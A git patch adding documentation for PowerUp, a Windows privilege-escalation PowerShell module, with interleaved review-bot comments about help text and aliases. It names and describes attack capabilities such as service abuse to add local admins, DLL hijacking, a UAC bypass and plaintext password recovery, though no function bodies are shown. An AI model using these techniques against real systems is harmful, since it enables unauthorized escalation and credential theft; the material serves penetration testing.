From 7964823e3f398c41a7ad1c0e8c4c28c0806a9c0d Mon Sep 17 00:00:00 2001 
From: HarmJ0y
Date: Wed, 14 Dec 2016 11:53:29 -0500
Subject: Added documentation for PowerUp
---
Privesc/PowerUp.ps1 | 190 ++++++++++-----------
Privesc/Privesc.psd1 | 43 +++--
Privesc/README.md | 22 +--
docs/Privesc/Add-ServiceDacl.md | 68 ++++++++
docs/Privesc/Enable-Privilege.md | 105 ++++++++++++
docs/Privesc/Find-PathDLLHijack.md | 45 +++++
docs/Privesc/Find-ProcessDLLHijack.md | 127 ++++++++++++++
docs/Privesc/Get-ApplicationHost.md | 95 +++++++++++
docs/Privesc/Get-CachedGPPPassword.md | 55 ++++++
docs/Privesc/Get-ModifiablePath.md | 102 ++++++++++++
docs/Privesc/Get-ModifiableRegistryAutoRun.md | 44 +++++
docs/Privesc/Get-ModifiableScheduledTaskFile.md | 45 +++++
docs/Privesc/Get-ModifiableService.md | 40 +++++
docs/Privesc/Get-ModifiableServiceFile.md | 45 +++++
docs/Privesc/Get-ProcessTokenGroup.md | 114 +++++++++++++
docs/Privesc/Get-ProcessTokenPrivilege.md | 131 +++++++++++++++
docs/Privesc/Get-RegistryAlwaysInstallElevated.md | 45 +++++
docs/Privesc/Get-RegistryAutoLogon.md | 44 +++++
docs/Privesc/Get-ServiceDetail.md | 65 ++++++++
docs/Privesc/Get-SiteListPassword.md | 96 +++++++++++
docs/Privesc/Get-System.md | 172 +++++++++++++++++++
docs/Privesc/Get-UnattendedInstallFile.md | 44 +++++
docs/Privesc/Get-UnquotedService.md | 45 +++++
docs/Privesc/Get-WebConfig.md | 93 +++++++++++
docs/Privesc/Install-ServiceBinary.md | 175 +++++++++++++++++++
docs/Privesc/Invoke-PrivescAudit.md | 63 +++++++
docs/Privesc/Invoke-ServiceAbuse.md | 194 ++++++++++++++++++++++
docs/Privesc/Invoke-WScriptUACBypass.md | 85 ++++++++++
docs/Privesc/Restore-ServiceBinary.md | 87 ++++++++++
docs/Privesc/Set-ServiceBinaryPath.md | 92 ++++++++++
docs/Privesc/Test-ServiceDaclPermission.md | 112 +++++++++++++
docs/Privesc/Write-HijackDll.md | 173 +++++++++++++++++++
docs/Privesc/Write-ServiceBinary.md | 191 +++++++++++++++++++++
docs/Privesc/Write-UserAddMSI.md | 56 +++++++
docs/Privesc/index.md | 55 ++++++
docs/index.md | 1 +
mkdocs.yml | 34 ++++
37 files changed, 3067 insertions(+), 126 deletions(-)
create mode 100755 docs/Privesc/Add-ServiceDacl.md
create mode 100755 docs/Privesc/Enable-Privilege.md
create mode 100755 docs/Privesc/Find-PathDLLHijack.md
create mode 100755 docs/Privesc/Find-ProcessDLLHijack.md
create mode 100755 docs/Privesc/Get-ApplicationHost.md
create mode 100755 docs/Privesc/Get-CachedGPPPassword.md
create mode 100755 docs/Privesc/Get-ModifiablePath.md
create mode 100755 docs/Privesc/Get-ModifiableRegistryAutoRun.md
create mode 100755 docs/Privesc/Get-ModifiableScheduledTaskFile.md
create mode 100755 docs/Privesc/Get-ModifiableService.md
create mode 100755 docs/Privesc/Get-ModifiableServiceFile.md
create mode 100755 docs/Privesc/Get-ProcessTokenGroup.md
create mode 100755 docs/Privesc/Get-ProcessTokenPrivilege.md
create mode 100755 docs/Privesc/Get-RegistryAlwaysInstallElevated.md
create mode 100755 docs/Privesc/Get-RegistryAutoLogon.md
create mode 100755 docs/Privesc/Get-ServiceDetail.md
create mode 100755 docs/Privesc/Get-SiteListPassword.md
create mode 100755 docs/Privesc/Get-System.md
create mode 100755 docs/Privesc/Get-UnattendedInstallFile.md
create mode 100755 docs/Privesc/Get-UnquotedService.md
create mode 100755 docs/Privesc/Get-WebConfig.md
create mode 100755 docs/Privesc/Install-ServiceBinary.md
create mode 100755 docs/Privesc/Invoke-PrivescAudit.md
create mode 100755 docs/Privesc/Invoke-ServiceAbuse.md
create mode 100755 docs/Privesc/Invoke-WScriptUACBypass.md
create mode 100755 docs/Privesc/Restore-ServiceBinary.md
create mode 100755 docs/Privesc/Set-ServiceBinaryPath.md
create mode 100755 docs/Privesc/Test-ServiceDaclPermission.md
create mode 100755 docs/Privesc/Write-HijackDll.md
create mode 100755 docs/Privesc/Write-ServiceBinary.md
create mode 100755 docs/Privesc/Write-UserAddMSI.md
create mode 100644 docs/Privesc/index.md
diff --git a/Privesc/PowerUp.ps1 b/Privesc/PowerUp.ps1
index 6fffef0..8ad9044 100644
--- a/Privesc/PowerUp.ps1
+++ b/Privesc/PowerUp.ps1
@@ -739,9 +739,9 @@ function Get-ModifiablePath { Parses a passed string containing multiple possible file/folder paths and returns the file paths where the current user has modification rights. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: None +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None .DESCRIPTION @@ -935,9 +935,9 @@ function Get-TokenInformation { Helpers that returns token groups or privileges for a passed process/thread token. Used by Get-ProcessTokenGroup and Get-ProcessTokenPrivilege. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: PSReflect +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect .DESCRIPTION @@ -1065,9 +1065,9 @@ function Get-ProcessTokenGroup { Returns all SIDs that the current token context is a part of, whether they are disabled or not. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: PSReflect, Get-TokenInformation +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Get-TokenInformation .DESCRIPTION @@ -1197,9 +1197,9 @@ function Get-ProcessTokenPrivilege { Returns all privileges for the current (or specified) process ID. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: PSReflect, Get-TokenInformation +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Get-TokenInformation .DESCRIPTION @@ -1354,9 +1354,9 @@ function Enable-Privilege { Enables a specific privilege for the current process. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: PSReflect +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect .DESCRIPTION 
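Review bot: Enable-Privilege's comment-based help (hunk @@ -1354) still has no .PARAMETER entry for its only parameter: the docs/Privesc/Enable-Privilege.md generated in this same commit carries the platyPS placeholder `{{Fill Privilege Description}}` under -Privilege, so the help block this hunk touches is where the gap has to be closed. A suitable entry, consistent with the .DESCRIPTION text and the String[] / Privileges alias shown in the generated page, is `.PARAMETER Privilege` followed by `One or more privilege names to enable for the current process; accepts strings or the output of Get-ProcessTokenPrivilege on the pipeline.` The rest of the help block and the function body lie outside the hunk, so the exact placement relative to the existing .EXAMPLE sections cannot be confirmed from here; regenerating the markdown afterwards will replace the placeholder.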
@@ -1451,9 +1451,9 @@ function Add-ServiceDacl { Adds a Dacl field to a service object returned by Get-Service. -Author: Matthew Graeber (@mattifestation) -License: BSD 3-Clause -Required Dependencies: PSReflect +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: PSReflect .DESCRIPTION @@ -1567,9 +1567,9 @@ function Set-ServiceBinaryPath { Sets the binary path for a service to a specified value. -Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation) -License: BSD 3-Clause -Required Dependencies: PSReflect +Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: PSReflect .DESCRIPTION @@ -1688,9 +1688,9 @@ function Test-ServiceDaclPermission { Tests one or more passed services or service names against a given permission set, returning the service objects where the current user have the specified permissions. -Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation) -License: BSD 3-Clause -Required Dependencies: Add-ServiceDacl +Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: Add-ServiceDacl .DESCRIPTION @@ -1868,9 +1868,9 @@ function Get-UnquotedService { Returns the name and binary path for services with unquoted paths that also have a space in the name. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: Get-ModifiablePath, Test-ServiceDaclPermission +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ModifiablePath, Test-ServiceDaclPermission .DESCRIPTION 
@@ -1931,9 +1931,9 @@ function Get-ModifiableServiceFile { Enumerates all services and returns vulnerable service files. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: Test-ServiceDaclPermission +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Test-ServiceDaclPermission, Get-ModifiablePath .DESCRIPTION @@ -1989,9 +1989,9 @@ function Get-ModifiableService { Enumerates all services and returns services for which the current user can modify the binPath. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: Test-ServiceDaclPermission +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Test-ServiceDaclPermission, Get-ServiceDetail .DESCRIPTION @@ -2036,9 +2036,9 @@ function Get-ServiceDetail { Returns detailed information about a specified service by querying the WMI win32_service class for the specified service name. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: None +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None .DESCRIPTION @@ -2109,9 +2109,9 @@ function Invoke-ServiceAbuse { Abuses a function the current user has configuration rights on in order to add a local administrator or execute a custom command. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: Get-ServiceDetail, Set-ServiceBinaryPath +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ServiceDetail, Set-ServiceBinaryPath .DESCRIPTION @@ -2346,9 +2346,9 @@ function Write-ServiceBinary { Patches in the specified command to a pre-compiled C# service executable and writes the binary out to the specified ServicePath location. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: None +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None .DESCRIPTION 
@@ -2529,9 +2529,9 @@ function Install-ServiceBinary { Replaces the service binary for the specified service with one that executes a specified command as SYSTEM. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: Get-ServiceDetail, Get-ModifiablePath, Write-ServiceBinary +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ServiceDetail, Get-ModifiablePath, Write-ServiceBinary .DESCRIPTION @@ -2698,9 +2698,9 @@ function Restore-ServiceBinary { Restores a service binary backed up by Install-ServiceBinary. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: Get-ServiceDetail, Get-ModifiablePath +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ServiceDetail, Get-ModifiablePath .DESCRIPTION @@ -2793,9 +2793,9 @@ function Find-ProcessDLLHijack { Finds all DLL hijack locations for currently running processes. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: None +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None .DESCRIPTION @@ -2948,9 +2948,9 @@ function Find-PathDLLHijack { Finds all directories in the system %PATH% that are modifiable by the current user. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: Get-ModifiablePath +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ModifiablePath .DESCRIPTION @@ -3001,9 +3001,9 @@ function Write-HijackDll { Patches in the path to a specified .bat (containing the specified command) into a pre-compiled hijackable C++ DLL writes the DLL out to the specified ServicePath location. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: None +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None .DESCRIPTION 
@@ -3229,9 +3229,9 @@ function Get-RegistryAlwaysInstallElevated { Checks if any of the AlwaysInstallElevated registry keys are set. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: None +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None .DESCRIPTION @@ -3298,9 +3298,9 @@ function Get-RegistryAutoLogon { Finds any autologon credentials left in the registry. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: None +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None .DESCRIPTION @@ -3361,9 +3361,9 @@ function Get-ModifiableRegistryAutoRun { Returns any elevated system autoruns in which the current user can modify part of the path string. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: None +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ModifiablePath .DESCRIPTION @@ -3439,9 +3439,9 @@ function Get-ModifiableScheduledTaskFile { Returns scheduled tasks where the current user can modify any file in the associated task action string. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: None +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ModifiablePath .DESCRIPTION @@ -3518,9 +3518,9 @@ function Get-UnattendedInstallFile { Checks several locations for remaining unattended installation files, which may have deployment credentials. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: None +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None .EXAMPLE 
@@ -3577,9 +3577,9 @@ function Get-WebConfig { This script will recover cleartext and encrypted connection strings from all web.config files on the system. Also, it will decrypt them if needed. -Author: Scott Sutherland, Antti Rantasaari -License: BSD 3-Clause -Required Dependencies: None +Author: Scott Sutherland, Antti Rantasaari +License: BSD 3-Clause +Required Dependencies: None .DESCRIPTION @@ -3791,9 +3791,9 @@ function Get-ApplicationHost { Recovers encrypted application pool and virtual directory passwords from the applicationHost.config on the system. -Author: Scott Sutherland -License: BSD 3-Clause -Required Dependencies: None +Author: Scott Sutherland +License: BSD 3-Clause +Required Dependencies: None .DESCRIPTION @@ -3952,10 +3952,10 @@ function Get-SiteListPassword { Retrieves the plaintext passwords for found McAfee's SiteList.xml files. Based on Jerome Nokin (@funoverip)'s Python solution (in links). -Author: Jerome Nokin (@funoverip) -PowerShell Port: @harmj0y -License: BSD 3-Clause -Required Dependencies: None +Author: Jerome Nokin (@funoverip) +PowerShell Port: @harmj0y +License: BSD 3-Clause +Required Dependencies: None .DESCRIPTION @@ -4153,9 +4153,9 @@ function Get-CachedGPPPassword { Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences and left in cached files on the host. -Author: Chris Campbell (@obscuresec), local cache mods by @harmj0y -License: BSD 3-Clause -Required Dependencies: None +Author: Chris Campbell (@obscuresec) +License: BSD 3-Clause +Required Dependencies: None .DESCRIPTION @@ -4360,9 +4360,9 @@ function Write-UserAddMSI { Writes out a precompiled MSI installer that prompts for a user/group addition. This function can be used to abuse Get-RegistryAlwaysInstallElevated. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: None +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None .DESCRIPTION 
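Review bot: The Get-CachedGPPPassword help (hunk @@ -4153) drops the "local cache mods by @harmj0y" credit from the Author line, while every other hunk in this file only normalizes whitespace on the Author/License/Required Dependencies lines. If the intent was whitespace cleanup only, the line should be restored as `Author: Chris Campbell (@obscuresec), local cache mods by @harmj0y`; if the attribution change is deliberate, the commit message should say so, since the generated docs/Privesc/Get-CachedGPPPassword.md in this commit already carries the shortened form and the two must stay in step.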
@@ -4414,9 +4414,9 @@ function Invoke-WScriptUACBypass { Performs the bypass UAC attack by abusing the lack of an embedded manifest in wscript.exe. -Author: Matt Nelson (@enigma0x3), Will Schroeder (@harmj0y), Vozzie -License: BSD 3-Clause -Required Dependencies: None +Author: Matt Nelson (@enigma0x3), Will Schroeder (@harmj0y), Vozzie +License: BSD 3-Clause +Required Dependencies: None .DESCRIPTION @@ -4650,9 +4650,9 @@ function Invoke-PrivescAudit { Executes all functions that check for various Windows privilege escalation opportunities. -Author: Will Schroeder (@harmj0y) -License: BSD 3-Clause -Required Dependencies: None +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None .DESCRIPTION @@ -4979,4 +4979,6 @@ $Advapi32 = $Types['advapi32'] $Kernel32 = $Types['kernel32'] $NTDll = $Types['ntdll'] +Set-Alias Get-CurrentUserTokenGroupSid Get-ProcessTokenGroup +Set-Alias Get-UnquotedService Get-UnquotedService Set-Alias Invoke-AllChecks Invoke-PrivescAudit diff --git a/Privesc/Privesc.psd1 b/Privesc/Privesc.psd1 index fb66225..6d4e3bd 100644 --- a/Privesc/Privesc.psd1 +++ b/Privesc/Privesc.psd1 
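Review bot: `Set-Alias Get-UnquotedService Get-UnquotedService` (hunk @@ -4979) aliases the function to its own name, which cannot be the intent; the README hunk in this commit replaces the old name Get-ServiceUnquoted with Get-UnquotedService, so the backward-compatibility alias should read `Set-Alias Get-ServiceUnquoted Get-UnquotedService`. Because PowerShell resolves aliases ahead of functions, a self-referential alias is at best a no-op and may instead shadow or break resolution of the function itself — worth exercising in a session before merging. The two new aliases, like the existing Invoke-AllChecks one, are only visible to module importers if Privesc.psd1 exports them via AliasesToExport; the manifest is touched in this commit but that entry is not in the visible hunk, so it should be checked alongside this change.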
@@ -23,37 +23,36 @@ PowerShellVersion = '2.0' # Functions to export from this module FunctionsToExport = @( - 'Add-ServiceDacl', - 'Enable-Privilege', - 'Find-PathDLLHijack', - 'Find-ProcessDLLHijack', - 'Get-ApplicationHost', - 'Get-CachedGPPPassword', 'Get-ModifiablePath', - 'Get-ModifiableRegistryAutoRun', - 'Get-ModifiableScheduledTaskFile', - 'Get-ModifiableService', - 'Get-ModifiableServiceFile', 'Get-ProcessTokenGroup', 'Get-ProcessTokenPrivilege', + 'Enable-Privilege', + 'Add-ServiceDacl', + 'Set-ServiceBinaryPath', + 'Test-ServiceDaclPermission', + 'Get-UnquotedService', + 'Get-ModifiableServiceFile', + 'Get-ModifiableService', + 'Get-ServiceDetail', + 'Invoke-ServiceAbuse', + 'Write-ServiceBinary', + 'Install-ServiceBinary', + 'Restore-ServiceBinary', + 'Find-ProcessDLLHijack', + 'Find-PathDLLHijack', + 'Write-HijackDll', 'Get-RegistryAlwaysInstallElevated', 'Get-RegistryAutoLogon', - 'Get-ServiceDetail', - 'Get-SiteListPassword', - 'Get-TokenInformation', - 'Get-UnquotedService', + 'Get-ModifiableRegistryAutoRun', + 'Get-ModifiableScheduledTaskFile', 'Get-UnattendedInstallFile', 'Get-WebConfig', - 'Install-ServiceBinary', - 'Invoke-ServiceAbuse', + 'Get-ApplicationHost', + 'Get-SiteListPassword', + 'Get-CachedGPPPassword', + 'Write-UserAddMSI', 'Invoke-WScriptUACBypass', 'Invoke-PrivescAudit', - 'Restore-ServiceBinary', - 'Set-ServiceBinaryPath', - 'Test-ServiceDaclPermission', - 'Write-UserAddMSI', - 'Write-HijackDll', - 'Write-ServiceBinary', 'Get-System' ) diff --git a/Privesc/README.md b/Privesc/README.md index d5b499c..ac161d8 100644 --- a/Privesc/README.md +++ b/Privesc/README.md 
@@ -27,13 +27,18 @@ Required Dependencies: None Optional Dependencies: None -### Service Enumeration: - Get-ServiceUnquoted - returns services with unquoted paths that also have a space in the name +### Token/Privilege Enumeration/Abuse: + Get-ProcessTokenGroup - returns all SIDs that the current token context is a part of, whether they are disabled or not + Get-ProcessTokenPrivilege - returns all privileges for the current (or specified) process ID + Enable-Privilege - enables a specific privilege for the current process + +### Service Enumeration/Abuse: + Test-ServiceDaclPermission - tests one or more passed services or service names against a given permission set + Get-UnquotedService - returns services with unquoted paths that also have a space in the name Get-ModifiableServiceFile - returns services where the current user can write to the service binary path or its config Get-ModifiableService - returns services the current user can modify Get-ServiceDetail - returns detailed information about a specified service - -### Service Abuse: + Set-ServiceBinaryPath - sets the binary path for a service to a specified value Invoke-ServiceAbuse - modifies a vulnerable service to create a local admin or execute a custom command Write-ServiceBinary - writes out a patched C# service binary that adds a local admin or executes a custom command Install-ServiceBinary - replaces a service binary with one that adds a local admin or executes a custom command @@ -45,7 +50,7 @@ Optional Dependencies: None Write-HijackDll - writes out a hijackable DLL ### Registry Checks: - Get-RegistryAlwaysInstallElevated - checks if the AlwaysInstallElevated registry key is set + Get-RegistryAlwaysInstallElevated - checks if the AlwaysInstallElevated registry key is set Get-RegistryAutoLogon - checks for Autologon credentials in the registry Get-ModifiableRegistryAutoRun - checks for any modifiable binaries/scripts (or their configs) in HKLM autoruns 
@@ -59,9 +64,6 @@ Optional Dependencies: None ### Other Helpers/Meta-Functions: Get-ModifiablePath - tokenizes an input string and returns the files in it the current user can modify - Get-CurrentUserTokenGroupSid - returns all SIDs that the current user is a part of, whether they are disabled or not - Add-ServiceDacl - adds a Dacl field to a service object returned by Get-Service - Set-ServiceBinPath - sets the binary path for a service to a specified value through Win32 API methods - Test-ServiceDaclPermission - tests one or more passed services or service names against a given permission set Write-UserAddMSI - write out a MSI installer that prompts for a user to be added - Invoke-AllChecks - runs all current escalation checks and returns a report + Invoke-WScriptUACBypass - performs the bypass UAC attack by abusing the lack of an embedded manifest in wscript.exe + Invoke-PrivescAudit - runs all current escalation checks and returns a report (formerly Invoke-AllChecks) diff --git a/docs/Privesc/Add-ServiceDacl.md b/docs/Privesc/Add-ServiceDacl.md new file mode 100755 index 0000000..13e4d64 --- /dev/null +++ b/docs/Privesc/Add-ServiceDacl.md 
@@ -0,0 +1,68 @@ +# Add-ServiceDacl + +## SYNOPSIS +Adds a Dacl field to a service object returned by Get-Service. + +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: PSReflect + +## SYNTAX + +``` +Add-ServiceDacl [-Name] +``` + +## DESCRIPTION +Takes one or more ServiceProcess.ServiceController objects on the pipeline and adds a +Dacl field to each object. +It does this by opening a handle with ReadControl for the +service with using the GetServiceHandle Win32 API call and then uses +QueryServiceObjectSecurity to retrieve a copy of the security descriptor for the service. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-Service | Add-ServiceDacl +``` + +Add Dacls for every service the current user can read. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-Service -Name VMTools | Add-ServiceDacl +``` + +Add the Dacl to the VMTools service object. + +## PARAMETERS + +### -Name +An array of one or more service names to add a service Dacl for. +Passable on the pipeline. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: ServiceName + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### ServiceProcess.ServiceController + +## NOTES + +## RELATED LINKS + +[https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/](https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/) + diff --git a/docs/Privesc/Enable-Privilege.md b/docs/Privesc/Enable-Privilege.md new file mode 100755 index 0000000..6de9c43 --- /dev/null +++ b/docs/Privesc/Enable-Privilege.md 
@@ -0,0 +1,105 @@ +# Enable-Privilege + +## SYNOPSIS +Enables a specific privilege for the current process. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect + +## SYNTAX + +``` +Enable-Privilege [-Privilege] +``` + +## DESCRIPTION +Uses RtlAdjustPrivilege to enable a specific privilege for the current process. +Privileges can be passed by string, or the output from Get-ProcessTokenPrivilege +can be passed on the pipeline. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-ProcessTokenPrivilege +``` + +Privilege Attributes ProcessId + --------- ---------- --------- + SeShutdownPrivilege DISABLED 3620 + SeChangeNotifyPrivilege ...AULT, SE_PRIVILEGE_ENABLED 3620 + SeUndockPrivilege DISABLED 3620 +SeIncreaseWorkingSetPrivilege DISABLED 3620 + SeTimeZonePrivilege DISABLED 3620 + +Enable-Privilege SeShutdownPrivilege + +Get-ProcessTokenPrivilege + + Privilege Attributes ProcessId + --------- ---------- --------- + SeShutdownPrivilege SE_PRIVILEGE_ENABLED 3620 + SeChangeNotifyPrivilege ...AULT, SE_PRIVILEGE_ENABLED 3620 + SeUndockPrivilege DISABLED 3620 +SeIncreaseWorkingSetPrivilege DISABLED 3620 + SeTimeZonePrivilege DISABLED 3620 + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-ProcessTokenPrivilege +``` + +Privilege Attributes ProcessId +--------- ---------- --------- +SeShutdownPrivilege DISABLED 2828 +SeChangeNotifyPrivilege ...AULT, SE_PRIVILEGE_ENABLED 2828 +SeUndockPrivilege DISABLED 2828 +SeIncreaseWorkingSetPrivilege DISABLED 2828 +SeTimeZonePrivilege DISABLED 2828 + + +Get-ProcessTokenPrivilege | Enable-Privilege -Verbose +VERBOSE: Attempting to enable SeShutdownPrivilege +VERBOSE: Attempting to enable SeChangeNotifyPrivilege +VERBOSE: Attempting to enable SeUndockPrivilege +VERBOSE: Attempting to enable SeIncreaseWorkingSetPrivilege +VERBOSE: Attempting to enable SeTimeZonePrivilege + +Get-ProcessTokenPrivilege + +Privilege Attributes 
ProcessId +--------- ---------- --------- +SeShutdownPrivilege SE_PRIVILEGE_ENABLED 2828 +SeChangeNotifyPrivilege ...AULT, SE_PRIVILEGE_ENABLED 2828 +SeUndockPrivilege SE_PRIVILEGE_ENABLED 2828 +SeIncreaseWorkingSetPrivilege SE_PRIVILEGE_ENABLED 2828 +SeTimeZonePrivilege SE_PRIVILEGE_ENABLED 2828 + +## PARAMETERS + +### -Privilege +{{Fill Privilege Description}} + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: Privileges + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES + +## RELATED LINKS + +[http://forum.sysinternals.com/tip-easy-way-to-enable-privileges_topic15745.html](http://forum.sysinternals.com/tip-easy-way-to-enable-privileges_topic15745.html) + diff --git a/docs/Privesc/Find-PathDLLHijack.md b/docs/Privesc/Find-PathDLLHijack.md new file mode 100755 index 0000000..f43fc69 --- /dev/null +++ b/docs/Privesc/Find-PathDLLHijack.md @@ -0,0 +1,45 @@ +# Find-PathDLLHijack + +## SYNOPSIS +Finds all directories in the system %PATH% that are modifiable by the current user. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ModifiablePath + +## SYNTAX + +``` +Find-PathDLLHijack +``` + +## DESCRIPTION +Enumerates the paths stored in Env:Path (%PATH) and filters each through Get-ModifiablePath +to return the folder paths the current user can write to. +On Windows 7, if wlbsctrl.dll is +written to one of these paths, execution for the IKEEXT can be hijacked due to DLL search +order loading. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Find-PathDLLHijack +``` + +Finds all %PATH% .DLL hijacking opportunities. + +## PARAMETERS + +## INPUTS + +## OUTPUTS + +### PowerUp.HijackableDLL.Path + +## NOTES + +## RELATED LINKS + +[http://www.greyhathacker.net/?p=738](http://www.greyhathacker.net/?p=738) + 
diff --git a/docs/Privesc/Find-ProcessDLLHijack.md b/docs/Privesc/Find-ProcessDLLHijack.md new file mode 100755 index 0000000..bbece58 --- /dev/null +++ b/docs/Privesc/Find-ProcessDLLHijack.md 
@@ -0,0 +1,127 @@ +# Find-ProcessDLLHijack + +## SYNOPSIS +Finds all DLL hijack locations for currently running processes. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Find-ProcessDLLHijack [[-Name] ] [-ExcludeWindows] [-ExcludeProgramFiles] [-ExcludeOwned] +``` + +## DESCRIPTION +Enumerates all currently running processes with Get-Process (or accepts an +input process object from Get-Process) and enumerates the loaded modules for each. +All loaded module name exists outside of the process binary base path, as those +are DLL load-order hijack candidates. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Find-ProcessDLLHijack +``` + +Finds possible hijackable DLL locations for all processes. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-Process VulnProcess | Find-ProcessDLLHijack +``` + +Finds possible hijackable DLL locations for the 'VulnProcess' processes. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Find-ProcessDLLHijack -ExcludeWindows -ExcludeProgramFiles +``` + +Finds possible hijackable DLL locations not in C:\Windows\* and +not in C:\Program Files\* or C:\Program Files (x86)\* + +### -------------------------- EXAMPLE 4 -------------------------- +``` +Find-ProcessDLLHijack -ExcludeOwned +``` + +Finds possible hijackable DLL location for processes not owned by the +current user. + +## PARAMETERS + +### -Name +The name of a process to enumerate for possible DLL path hijack opportunities. 
+ +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: ProcessName + +Required: False +Position: 1 +Default value: $(Get-Process | Select-Object -Expand Name) +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -ExcludeWindows +Exclude paths from C:\Windows\* instead of just C:\Windows\System32\* + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ExcludeProgramFiles +Exclude paths from C:\Program Files\* and C:\Program Files (x86)\* + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ExcludeOwned +Exclude processes the current user owns. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerUp.HijackableDLL.Process + +## NOTES + +## RELATED LINKS + +[https://www.mandiant.com/blog/malware-persistence-windows-registry/](https://www.mandiant.com/blog/malware-persistence-windows-registry/) + diff --git a/docs/Privesc/Get-ApplicationHost.md 